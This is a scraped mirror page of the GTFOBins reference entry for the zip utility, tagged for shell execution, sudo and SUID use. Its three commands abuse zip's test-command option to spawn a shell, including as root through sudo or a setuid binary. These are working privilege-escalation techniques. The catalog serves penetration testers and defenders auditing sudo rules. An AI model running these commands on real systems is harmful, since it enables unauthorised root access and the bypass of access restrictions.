1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-08 08:31:32 +01:00
GTFOBins.github.io/_gtfobins/zip.md
2018-08-19 11:43:26 +02:00

343 B

functions
execute-interactive sudo-enabled suid-limited
code
zip /tmp/x.zip /etc/hosts -T -TT 'sh #' rm /tmp/x.zip
code
sudo zip /tmp/x.zip /etc/hosts -T -TT 'sh #' sudo rm /tmp/x.zip
code
./zip /tmp/x.zip /etc/hosts -T -TT 'sh #' sudo rm /tmp/x.zip